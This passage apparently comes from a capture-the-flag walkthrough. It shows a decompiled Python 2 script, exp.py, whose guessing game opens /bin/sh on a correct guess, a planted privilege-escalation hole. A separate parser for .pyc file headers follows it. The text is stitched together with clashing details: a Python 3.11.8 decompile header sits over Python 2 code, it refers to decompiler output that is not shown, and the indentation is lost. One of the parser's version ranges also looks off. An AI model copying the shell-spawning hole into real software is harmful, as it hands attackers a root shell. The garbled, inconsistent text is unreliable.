# Decompiled from: Python 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 22:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
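Before handing a recovered .pyc to a decompiler it helps to read its header and confirm which interpreter produced it (uncompyle6 reported "bytecode version base 2.7 (62211)" above; a Python 3 file has a different header layout and needs a different tool). The parser below is an added example, not part of the walkthrough: it decodes the magic number and the timestamp or source-hash fields for the 2.7, 3.3 to 3.6, and 3.7+ layouts, on constructed sample headers.

```python
import struct
from datetime import datetime, timezone

# Inclusive (first, last) magic numbers used by each CPython minor version,
# taken from the MAGIC_NUMBER history in importlib/_bootstrap_external.py.
MAGIC_RANGES = [
    ((62171, 62211), (2, 7)),
    ((3320, 3351), (3, 5)),
    ((3360, 3379), (3, 6)),
    ((3390, 3394), (3, 7)),
    ((3400, 3413), (3, 8)),
    ((3420, 3425), (3, 9)),
    ((3430, 3439), (3, 10)),
    ((3450, 3495), (3, 11)),
    ((3500, 3531), (3, 12)),
]


def version_from_magic(magic):
    """Map a 16-bit magic number to (major, minor), or None if unknown."""
    for (lo, hi), version in MAGIC_RANGES:
        if lo <= magic <= hi:
            return version
    return None


def parse_pyc_header(data):
    """Decode the header of a .pyc file; raises ValueError on junk."""
    if len(data) < 8 or data[2:4] != b"\r\n":
        raise ValueError("not a pyc header: magic must end in CR LF")
    (magic,) = struct.unpack("<H", data[:2])
    version = version_from_magic(magic)
    if version is None:
        raise ValueError("unrecognised magic number %d" % magic)
    info = {"magic": magic, "version": "%d.%d" % version}
    if version[0] == 2:
        # Python 2: magic(4) + mtime(4); marshalled code object follows at offset 8.
        (info["mtime"],) = struct.unpack("<I", data[4:8])
        info["header_len"] = 8
    elif version[1] < 7:
        # Python 3.3-3.6: magic(4) + mtime(4) + source size(4).
        info["mtime"], info["source_size"] = struct.unpack("<II", data[4:12])
        info["header_len"] = 12
    else:
        # PEP 552 (3.7+): magic(4) + flags(4) + either mtime+size or an 8-byte source hash.
        (flags,) = struct.unpack("<I", data[4:8])
        info["flags"] = flags
        if flags & 1:
            info["source_hash"] = data[8:16].hex()
        else:
            info["mtime"], info["source_size"] = struct.unpack("<II", data[8:16])
        info["header_len"] = 16
    if "mtime" in info:
        stamp = datetime.fromtimestamp(info["mtime"], tz=timezone.utc)
        info["compiled_at"] = stamp.strftime("%Y-%m-%d %H:%M:%S UTC")
    return info


def make_header(magic, *fields):
    """Build a header for the constructed samples: magic word + little-endian fields."""
    return struct.pack("<H", magic) + b"\r\n" + b"".join(fields)


# Constructed sample headers (not real files). The first uses the 2.7 magic
# 62211 and the compile time uncompyle6 reported above, taken here as UTC.
SAMPLE_PY27 = make_header(62211, struct.pack("<I", 1573164318))
SAMPLE_PY38 = make_header(3413, struct.pack("<III", 0, 1573164318, 1200))
SAMPLE_PY311_HASHED = make_header(3495, struct.pack("<I", 1), bytes(range(1, 9)))

if __name__ == "__main__":
    for name, hdr in [("py27", SAMPLE_PY27), ("py38", SAMPLE_PY38), ("py311", SAMPLE_PY311_HASHED)]:
        print(name, parse_pyc_header(hdr))
```

On a real file, `parse_pyc_header(open(".pyc", "rb").read())` gives the version to pick the decompiler for and the offset at which the marshalled code object starts.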